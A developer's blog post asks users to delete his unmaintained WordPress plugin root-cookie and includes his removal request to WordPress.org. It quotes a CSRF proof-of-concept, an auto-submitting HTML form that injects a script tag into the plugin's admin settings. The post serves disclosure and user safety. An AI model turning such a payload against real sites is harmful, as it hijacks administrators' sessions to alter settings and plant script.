LI Nick X.com
Blog |Follow Nick on Mastodon| About
 

TLDR: 🔥🔥🔥 If you still use root-cookie, please delete it from your WordPress/Website 🔥🔥🔥🔥

Today I have requested that the Plugins team over at WordPress.org org delete my root-cookie plugin. I started it back in 2008 for WP 2.6, probably before if you dig into the SVN history, back when things were very different.

Back in the early days of WordPress, it was a "sub directory", i.e. you setup your site with a home page, and then WordPress (blog) was a below that. The problem root-cookie was designed to solve, is that there was no way of accessing the WordPress authentication cookie outside the WordPress folder, so if you wanted to something as simple as change a banner, or theme based on being logged in, you could't. root-cookie was very simple, it hooked into WordPress's authentication functions and stripped the folder out of the cookie, and assigned it to the "root" of the domain, then from your custom code you could read it and do whatever.

I really, really cannot remember what the admin page did or looked like, there's probably some screenshots around here but apparently it contains a Cross Site Request Forgery (CSRF) vulnerability, the steps (apparently, I've not tested) to reproduce are:

Make a logged in admin click a link with the following HTML (replace the domain)

<!DOCTYPE html>
<html>
<body onload="document.forms[0].submit()">
<form action="http://{domain}/wp-admin/options-general.php?page=root-cookie" method="POST">
<input type="hidden" name="rootcookie_submit_hidden" value='Y' />
<input type="hidden" name="rootcookie_subdomain_manual" value='&"><script>alert(1)</script>' />
</form>
</body>
</html>

REF: https://patchstack.com/

👉🏻 Given that I have not maintained this plugin for over 13 years, I do NOT intend to publish an update and have requested the plugin be deleted.

From: Nick
To: plugins wordpress.org
Date: 14 Dec 2024, 15:47
Subject: Please Delete "root-cookie"
Body:

Hello, Please delete https://wordpress.org/plugins/root-cookie/

The plugin has not been maintained in 13years, apparently recently it was discovered to contain a CSRF vulnerability, I do not intend to fix it therefore it would be safer for the community if the plugin is removed from wordpress.org.

Stats show only 11 downloads per week, I don't suppose the plugin is needed anymore, the first version was released in 2008 for WP2.6, I expect a lot has changed since then :)

Many Thanks in advance for your support.
Kind Regards,
Nick

 

 
Nick Bettison ©